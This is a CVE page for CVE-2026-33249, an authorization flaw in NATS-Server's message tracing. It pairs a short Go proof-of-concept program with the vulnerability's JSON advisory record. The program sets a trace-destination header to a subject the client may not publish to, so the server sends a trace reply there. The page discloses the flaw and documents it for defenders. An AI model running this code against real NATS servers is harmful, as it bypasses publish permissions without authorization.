CVE-2026-33249

package main import ( "fmt" "github.com/nats-io/nats.go" ) // Conceptual Proof of Concept for CVE-2026-33249 // This demonstrates how a client might attempt to redirect trace messages. func main() { // 1. Connect to the vulnerable NATS server // Note: Requires a valid user account (Low Privilege) nc, err := nats.Connect("nats://localhost:4222") if err != nil { panic(err) } defer nc.Close() // 2. Define a target subject the client is NOT allowed to publish to // For example, a sensitive administrative subject restrictedSubject := "admin.system.alerts" // 3. Create a message with a tracing header // The vulnerability allows the client to dictate where the trace goes msg := nats.NewMsg("service.request") // Setting a custom header to exploit the tracing logic msg.Header.Set("Nats-Trace-Destination", restrictedSubject) // 4. Publish the message // In vulnerable versions, the server sends a trace reply to 'restrictedSubject' // without checking if the client has publish permissions for that subject. err = nc.PublishMsg(msg) if err != nil { fmt.Println("Publish error:", err) } else { fmt.Printf("Successfully published message. Trace may have been sent to restricted subject: %s\n", restrictedSubject) } }

{"cve": {"id": "CVE-2026-33249", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:47.737", "lastModified": "2026-03-26T16:20:55.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Starting in version 2.11.0 and prior to versions 2.11.15 and 2.12.6, a valid client which uses message tracing headers can indicate that the trace messages can be sent to an arbitrary valid subject, including those to which the client does not have publish permission. The payload is a valid trace message and not chosen by the attacker. Versions 2.11.15 and 2.12.6 contain a fix. No known workarounds are available."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. A partir de la versión 2.11.0 y antes de las versiones 2.11.15 y 2.12.6, un cliente válido que utiliza encabezados de rastreo de mensajes puede indicar que los mensajes de rastreo pueden enviarse a un asunto válido arbitrario, incluidos aquellos para los que el cliente no tiene permiso de publicación. La carga útil es un mensaje de rastreo válido y no es elegido por el atacante. Las versiones 2.11.15 y 2.12.6 contienen una corrección. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.11.0", "versionEndExcluding": "2.11.15", "matchCriteriaId": "04A14239-FB32-4FD3-8B45-BDE015A7F721"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-15.txt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-8m2x-3m6q-6w8j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}